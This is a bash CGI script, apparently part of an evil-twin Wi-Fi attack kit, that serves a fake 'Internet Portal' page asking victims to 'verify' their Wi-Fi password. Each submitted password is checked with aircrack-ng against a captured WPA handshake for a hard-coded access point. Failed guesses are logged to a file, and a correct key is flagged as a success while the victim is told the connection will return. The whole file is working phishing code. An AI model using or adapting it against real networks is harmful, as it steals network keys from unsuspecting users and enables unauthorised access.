#!/usr/bin/env bash
echo '<!DOCTYPE html>'
echo '<html>'
echo -e '\t<head>'
echo -e '\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>'
echo -e '\t\t<title>Internet Portal</title>'
echo -e '\t\t<link rel="stylesheet" type="text/css" href="portal.css"/>'
echo -e '\t\t<script type="text/javascript" src="portal.js"></script>'
echo -e '\t</head>'
echo -e '\t<body>'
echo -e '\t\t<nav>'
echo -e '\t\t\t\t<div class="sign-in">verifikasi password :</div>'
echo -e '\t\t</nav>'
echo -e '\t\t<div class="content scheck-color">'
echo -e '\t\t\t<center><p class="info-chack">'
POST_DATA=$(cat /dev/stdin)
if [[ "${REQUEST_METHOD}" = "POST" ]] && [[ "${CONTENT_LENGTH}" -gt 0 ]]; then
POST_DATA=${POST_DATA#*=}
password=${POST_DATA//+/ }
password=${password//[*&\/?<>]}
password=$(printf '%b' "${password//%/\\x}")
password=${password//[*&\/?<>]}
fi
if [[ "${#password}" -ge 8 ]] && [[ "${#password}" -le 63 ]]; then
rm -rf "/tmp/ag1/www/ag.et_currentpass.txt" > /dev/null 2>&1
echo "${password}" >\
"/tmp/ag1/www/ag.et_currentpass.txt"
aircrack-ng -a 2 -b C8:4C:78:2C:C3:FE -w "/tmp/ag1/www/ag.et_currentpass.txt" "/root/handshake-C8:4C:78:2C:C3:FE.cap" | grep "KEY FOUND!" > /dev/null
if [ "$?" = "0" ]; then
touch "/tmp/ag1/www/ag.et_success.txt" > /dev/null 2>&1
echo 'The password is correct, the connection will be restablished in a few moments'
et_successful=1
else
echo "${password}" >>\
"/tmp/ag1/www/ag.et_attempts.txt"
echo 'Please wait while the system is verifying the password you entered. If the password is incorrect, you will be redirected to the main page.'
et_successful=0
fi
elif [[ "${#password}" -gt 0 ]] && [[ "${#password}" -lt 8 ]]; then
echo 'Error. The password must be at least 8 characters. Redirecting to the main screen'
et_successful=0
else
echo 'An unexpected error occurred, redirecting to the main screen'
et_successful=0
fi
echo -e '\t\t\t</p></center>'
echo -e '\t\t</div>'
echo -e '\t</body>'
echo '</html>'
if [ "${et_successful}" -eq 1 ]; then
exit 0
else
echo '<script type="text/javascript">'
echo -e '\tsetTimeout("redirect()", 3500);'
echo '</script>'
exit 1
fi
